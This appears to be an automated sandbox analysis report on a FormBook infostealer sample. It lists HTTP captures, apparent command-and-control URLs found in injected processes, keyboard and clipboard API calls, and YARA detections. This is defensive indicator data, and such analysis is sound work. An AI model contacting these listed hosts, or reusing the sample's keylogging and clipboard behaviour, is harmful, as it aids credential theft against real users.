6c 61 73 73 3d 22 62 6f 78 22 3e 0a 0a 0a 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 74 69 74 6c 65 43 6f 6e 74 65 6e 74 22 3e 0a 20 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 74 69 74 6c 65 22 3e e7 b3 bb e7 bb 9f e6 8f 90 e7 a4 ba 3c 2f 64 69 76 3e 0a 20 20 20 20 3c 2f 64 69 76 3e 0a 20 20 20 20 0a 09 Data Ascii: <!DOCTYPE HTML><head><meta http-equiv="Content-Type" content="text/html; charset=utf-8" /><meta name="viewport" content="width=device-width, initial-scale=1.0, maximum-scale=1.0, user-scalable=0"><title></title><link type="text/css" href='//2.ss.508sys.com/css/dist/styles/zhaobudaoye.min.css?v=202402221530' rel="stylesheet" /></head><body class=""><div class="box"><div class="titleContent"> <div class="title"></div> </div>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: F-WEBDate: Fri, 10 Jan 2025 21:50:24 GMTContent-Type: text/html; charset=UTF-8Content-Length: 910Connection: closeFAI-W-FLOW: 1594240038Service-Lane: e8594f12d42b28ee5775cc58b9d2e933FAI-W-AGENT_AID: 32663896Update-Time: 1736399500Src-Update: trueP3P: CP=CAO PSA OUROrigin-Agent-Cluster: ?0X-Content-Type-Options: nosniffX-Permitted-Cross-Domain-Policies: noneX-XSS-Protection: 1; mode=blockX-Download-Options: noopenX-Frame-Options: SAMEORIGINSet-Cookie: _cliid=vAEh7wCIuwBiLsCY; domain=www.yunlekeji.top; path=/; expires=Sat, 10-Jan-2026 21:50:24 GMT; HttpOnlySet-Cookie: _lastEnterDay=2025-01-11; domain=www.yunlekeji.top; path=/; expires=Sun, 12-Jan-2025 21:50:24 GMT; HttpOnlyData Raw: 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 20 2f 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 2c 20 6d 61 78 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2e 30 2c 20 75 73 65 72 2d 73 63 61 6c 61 62 6c 65 3d 30 22 3e 0a 3c 74 69 74 6c 65 3e e7 b3 bb e7 bb 9f e6 8f 90 e7 a4 ba 3c 2f 74 69 74 6c 65 3e 0a 0a 3c 6c 69 6e 6b 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 20 68 72 65 66 3d 27 2f 2f 32 2e 73 73 2e 35 30 38 73 79 73 2e 63 6f 6d 2f 63 73 73 2f 64 69 73 74 2f 73 74 79 6c 65 73 2f 7a 68 61 6f 62 75 64 61 6f 79 65 2e 6d 69 6e 2e 63 73 73 3f 76 3d 32 30 32 34 30 32 32 32 31 35 33 30 27 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 2f 3e 0a 0a 3c 2f 68 65 61 64 3e 0a 0a 3c 62 6f 64 79 20 63 6c 61 73 73 3d 22 22 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 62 6f 78 22 3e 0a 0a 0a 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 74 69 74 6c 65 43 6f 6e 74 65 6e 74 22 3e 0a 20 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 74 69 74 6c 65 22 3e e7 b3 bb e7 bb 9f e6 8f 90 e7 a4 ba 3c 2f 64 69 76 3e 0a 20 20 20 20 3c 2f 64 69 76 3e 0a 20 20 20 20 0a 09 Data Ascii: <!DOCTYPE HTML><head><meta http-equiv="Content-Type" content="text/html; charset=utf-8" /><meta name="viewport" content="width=device-width, initial-scale=1.0, maximum-scale=1.0, user-scalable=0"><title></title><link type="text/css" href='//2.ss.508sys.com/css/dist/styles/zhaobudaoye.min.css?v=202402221530' rel="stylesheet" /></head><body class=""><div class="box"><div class="titleContent"> <div class="title"></div> </div>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=UTF-8Connection: closeDate: Fri, 10 Jan 2025 21:50:25 GMTContent-Length: 910X-Content-Type-Options: nosniffX-Frame-Options: SAMEORIGINX-Download-Options: noopenX-XSS-Protection: 1; mode=blockCache-Flow: 7580625823Origin-Agent-Cluster: ?0FAI-W-FLOW: 1594326038FAI-W-AGENT-AID: 32663896Service-Lane: e8594f12d42b28ee5775cc58b9d2e933P3P: CP=CAO PSA OURX-Permitted-Cross-Domain-Policies: noneServer: F-WEBData Raw: 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 20 2f 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 2c 20 6d 61 78 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2e 30 2c 20 75 73 65 72 2d 73 63 61 6c 61 62 6c 65 3d 30 22 3e 0a 3c 74 69 74 6c 65 3e e7 b3 bb e7 bb 9f e6 8f 90 e7 a4 ba 3c 2f 74 69 74 6c 65 3e 0a 0a 3c 6c 69 6e 6b 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 20 68 72 65 66 3d 27 2f 2f 32 2e 73 73 2e 35 30 38 73 79 73 2e 63 6f 6d 2f 63 73 73 2f 64 69 73 74 2f 73 74 79 6c 65 73 2f 7a 68 61 6f 62 75 64 61 6f 79 65 2e 6d 69 6e 2e 63 73 73 3f 76 3d 32 30 32 34 30 32 32 32 31 35 33 30 27 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 2f 3e 0a 0a 3c 2f 68 65 61 64 3e 0a 0a 3c 62 6f 64 79 20 63 6c 61 73 73 3d 22 22 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 62 6f 78 22 3e 0a 0a 0a 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 74 69 74 6c 65 43 6f 6e 74 65 6e 74 22 3e 0a 20 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 74 69 74 6c 65 22 3e e7 b3 bb e7 bb 9f e6 8f 90 e7 a4 ba 3c 2f 64 69 76 3e 0a 20 20 20 20 3c 2f 64 69 76 3e 0a 20 20 20 20 0a 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 6f 6e 74 65 6e 74 22 3e 0a 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 75 6f 77 75 49 6d 67 22 3e 3c 2f 64 69 76 3e 0a 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 6d 73 67 22 3e 0a 09 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 69 6d 67 22 3e 20 3c 2f 64 69 76 3e 0a 09 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 69 6e 66 6f 22 3e 34 30 34 3a 20 e6 82 a8 e8 ae bf e9 97 ae e7 9a 84 e9 a1 b5 e9 9d a2 e4 b8 8d e5 ad 98 e5 9c a8 e3 80 82 3c 2f 64 69 76 3e 0a 09 09 3c 2f 64 69 76 3e 0a 20 20 20 20 20 20 20 0a 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 75 6f 77 75 42 75 74 74 6f 6e 22 3e 0a 0a 09 09 09 3c 61 20 68 72 65 66 3d 27 2f 27 3e 0a 09 09 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 62 61 63 6b 22 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 Data Ascii: <!DOCTYPE HTML><head><meta http-equiv="Content-Type" content="text/html; charset=utf-8" /><meta name="viewport" content="width=device-width, initial-scale=1.0, maximum-scale=1.0, user-scalable=0"><title></title><link type="text/css" hr
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Fri, 10 Jan 2025 21:50:32 GMTContent-Type: text/htmlContent-Length: 548Connection: closeData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Fri, 10 Jan 2025 21:50:35 GMTContent-Type: text/htmlContent-Length: 548Connection: closeData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Fri, 10 Jan 2025 21:50:38 GMTContent-Type: text/htmlContent-Length: 548Connection: closeData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Fri, 10 Jan 2025 21:50:40 GMTContent-Type: text/htmlContent-Length: 548Connection: closeData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->

Source: mobsync.exe, 00000005.00000002.3299870196.0000000004F56000.00000004.10000000.00040000.00000000.sdmp, JqFbrQRYIbA.exe, 00000006.00000002.3298979435.0000000002B06000.00000004.00000001.00040000.00000000.sdmp	String found in binary or memory: http://aballanet.cat/6xrr/?2nI=HxJAUmNG5a
Source: mobsync.exe, 00000005.00000002.3301333103.00000000072D0000.00000004.00000800.00020000.00000000.sdmp, JqFbrQRYIbA.exe, 00000006.00000002.3298979435.0000000002E2A000.00000004.00000001.00040000.00000000.sdmp	String found in binary or memory: http://www.canadavinreport.site/g3h7/?2nI=dyqW
Source: mobsync.exe, 00000005.00000002.3299870196.0000000004DC4000.00000004.10000000.00040000.00000000.sdmp, JqFbrQRYIbA.exe, 00000006.00000002.3298979435.0000000002974000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000008.00000002.1982761385.0000000006C24000.00000004.80000000.00040000.00000000.sdmp	String found in binary or memory: http://www.litespeedtech.com/error-page
Source: JqFbrQRYIbA.exe, 00000006.00000002.3298979435.0000000002C98000.00000004.00000001.00040000.00000000.sdmp	String found in binary or memory: http://www.madhf.tech/0mwe/?2nI=I6/MvosI1M4GXnAC7bSYGFqrxYdgJTNe9tmkEszzRtOWIwRcIvXs05Ha3jXYoQpxdY5h
Source: JqFbrQRYIbA.exe, 00000006.00000002.3300816355.0000000004A25000.00000040.80000000.00040000.00000000.sdmp	String found in binary or memory: http://www.zkdamdjj.shop
Source: JqFbrQRYIbA.exe, 00000006.00000002.3300816355.0000000004A25000.00000040.80000000.00040000.00000000.sdmp	String found in binary or memory: http://www.zkdamdjj.shop/kf1m/
Source: mobsync.exe, 00000005.00000002.3301419462.000000000757B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://ac.ecosia.org/autocomplete?q=
Source: mobsync.exe, 00000005.00000002.3301419462.000000000757B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
Source: mobsync.exe, 00000005.00000002.3301419462.000000000757B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
Source: mobsync.exe, 00000005.00000002.3301419462.000000000757B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
Source: mobsync.exe, 00000005.00000002.3301333103.00000000072D0000.00000004.00000800.00020000.00000000.sdmp, JqFbrQRYIbA.exe, 00000006.00000002.3298979435.00000000032E0000.00000004.00000001.00040000.00000000.sdmp	String found in binary or memory: https://down-sz.trafficmanager.net/?hh=
Source: mobsync.exe, 00000005.00000002.3301419462.000000000757B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/ac/?q=
Source: mobsync.exe, 00000005.00000002.3301419462.000000000757B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/chrome_newtab
Source: mobsync.exe, 00000005.00000002.3301419462.000000000757B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
Source: mobsync.exe, 00000005.00000002.3296697636.0000000000786000.00000004.00000020.00020000.00000000.sdmp, mobsync.exe, 00000005.00000002.3296697636.000000000076F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/oauth20_authorize.srf?client_id=00000000480728C5&scope=service::ssl.live.com:
Source: mobsync.exe, 00000005.00000002.3296697636.0000000000786000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/oauth20_authorize.srfclient_id=00000000480728C5&scope=service::ssl.live.com::
Source: mobsync.exe, 00000005.00000003.1870441456.0000000007556000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/oauth20_authorize.srfhttps://login.live.com/oauth20_desktop.srfhttps://login.
Source: mobsync.exe, 00000005.00000002.3296697636.000000000076F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/oauth20_desktop.srf?lc=1033
Source: mobsync.exe, 00000005.00000002.3296697636.000000000076F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/oauth20_desktop.srflc=1033
Source: mobsync.exe, 00000005.00000002.3296697636.000000000076F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/oauth20_logout.srf?client_id=00000000480728C5&redirect_uri=https://login.live
Source: mobsync.exe, 00000005.00000002.3296697636.0000000000786000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/oauth20_logout.srfclient_id=00000000480728C5&redirect_uri=https://login.live.
Source: mobsync.exe, 00000005.00000002.3301419462.000000000757B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.ecosia.org/newtab/

Source: C:\Users\user\Desktop\M7XS5C07kV.exe

Code function: 0_2_00644164 OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,_wcscpy,GlobalUnlock,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard,

0_2_00644164

Source: C:\Users\user\Desktop\M7XS5C07kV.exe

Code function: 0_2_00644164 OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,_wcscpy,GlobalUnlock,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard,

0_2_00644164

Source: C:\Users\user\Desktop\M7XS5C07kV.exe

Code function: 0_2_00643F66 OpenClipboard,IsClipboardFormatAvailable,IsClipboardFormatAvailable,GetClipboardData,CloseClipboard,GlobalLock,CloseClipboard,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,DragQueryFileW,DragQueryFileW,DragQueryFileW,GlobalUnlock,CountClipboardFormats,CloseClipboard,

0_2_00643F66

Source: C:\Users\user\Desktop\M7XS5C07kV.exe

Code function: 0_2_0063001C GetKeyboardState,SetKeyboardState,GetAsyncKeyState,GetAsyncKeyState,GetKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,

0_2_0063001C

Source: C:\Users\user\Desktop\M7XS5C07kV.exe

Code function: 0_2_0065CABC DefDlgProcW,SendMessageW,GetWindowLongW,SendMessageW,SendMessageW,_wcsncpy,GetKeyState,GetKeyState,GetKeyState,SendMessageW,GetKeyState,SendMessageW,SendMessageW,SendMessageW,ImageList_SetDragCursorImage,ImageList_BeginDrag,SetCapture,ClientToScreen,ImageList_DragEnter,InvalidateRect,ReleaseCapture,GetCursorPos,ScreenToClient,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,GetCursorPos,ScreenToClient,GetParent,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,GetWindowLongW,

0_2_0065CABC

E-Banking Fraud

Yara detected FormBook

Source: Yara match	File source: 2.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000006.00000002.3300816355.00000000049C0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.3296540364.00000000006E0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.3295915751.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.3296328965.0000000000690000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.1689038879.0000000005A50000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.1687870269.0000000003590000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.1685947198.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.3298177839.0000000004F00000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY

System Summary

Binary is likely a compiled AutoIt script file

Source: C:\Users\user\Desktop\M7XS5C07kV.exe	Code function: This is a third-party compiled AutoIt script.	0_2_005D3B3A
Source: M7XS5C07kV.exe	String found in binary or memory: This is a third-party compiled AutoIt script.
